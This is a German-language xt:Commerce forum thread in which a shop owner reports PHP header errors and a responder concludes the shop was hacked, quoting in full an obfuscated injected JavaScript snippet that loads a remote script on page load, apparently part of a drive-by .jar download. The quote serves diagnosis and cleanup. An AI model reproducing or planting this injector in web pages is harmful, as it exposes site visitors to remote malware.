Jump to content
xt:Commerce Community Forum

Problem seid kurzem mit dem Shop


Recommended Posts

Hallo zusammen,

ich habe ein Problem mit meinem Shop. Es fing heute mittag an. Zur Zeit kommt folgende Fehlermeldung wenn man einen Artikel in den Warenkorb gelegt hat.

Warning: Cannot modify header information - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:108) in /homepages/13/d97908204/htdocs/pfalzcarp/inc/xtc_redirect.inc.php on line 29

Wenn ich dann F5 drück ist der Artikel im Korb und der Shop erschient wieder.

Wie kann ich das beheben ?

Vielen Dank für Eure Hilfe !

Gruss,

Torsten

Link to comment
Share on other sites

es geht leider weiter ...

der login als admin geht nicht mehr, es kommt diese Meldung:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/includes/functions/sessions.php on line 76

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/includes/functions/sessions.php on line 76

Warning: Cannot modify header information - headers already sent by (output started at /homepages/13/d97908204/htdocs/pfalzcarp/includes/classes/main.php:109) in /homepages/13/d97908204/htdocs/pfalzcarp/inc/xtc_redirect.inc.php on line 29

Link to comment
Share on other sites

Schau mal auf dem dem Server nach, wann die Files zuletzt geändert wurden.

Ich vermute Dein Shop wurde gehackt. In Quelltext steht überall

<script>/*GNU GPL*/ try{window.onload = function(){var Reo0kbvrvrz = document.createElement('s^$@c&r#$(#i$#)p^t#&)$'.replace(/\(|@|&|\$|\)|\^|\!|#/ig, ''));Reo0kbvrvrz.setAttribute('type', 'text/javascript');Reo0kbvrvrz.setAttribute('src', 'h&t#@t(p&:&(/&&/!p^(e^&)r$@e@)z$!h()#^i))$l$@&t##!!o)#$n&-^#c&o^)m&$.$^k^!a@(#&s^&&!(k&^u)@#$s!(#.!@$)u!s@.&)^5#$$(1!)#y@!(e!s#)$)-@^^@c&$@&o@@(m($.(m@$@u!)^s#^$i&c#$b!o@x$$p&$#)r#o).^r)!#$u$$:#@^8$#0#)8^#&0(^#/)o&(#)$r)!k#&u(&!&t#.&^&c)$$(o#)#.!&&i((n&)(/()(o&!r@$k@#u$$()!t@$.#c&o)#$.^&)i#n!@@/#!(@(f!)@e$)&^e((d^b($u$(@((r@&$@n##(^e(r@@@.&^&(#c&@&o#^(#m!^&/@@@g)l(^$o)!b##)@!e)&^7&^!$.@)c)!(!o&m)!/@^#g#@^(o^@o#$g@(l$(#e@.!&c((o!m@#$)/@)'.replace(/\!|\)|&|\$|\(|@|#|\^/ig, ''));Reo0kbvrvrz.setAttribute('defer', 'defer');Reo0kbvrvrz.setAttribute('id', 'M)#&v^@w!^!#2^@&!6&^()8^#h)n$!^(f)()o&@4)q^'.replace(/@|\!|&|\(|\)|\$|#|\^/ig, ''));document.body.appendChild(Reo0kbvrvrz);}} catch(e) {}</script>

und meine Firewall wird auch ganz nervös, weil von einer russischen WebSite ein .jar File geladen wird.

Also ganz schnell das Backup aufspielen, denn für Deine Kunden ist das nicht so toll an Weihnachten.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
  • Create New...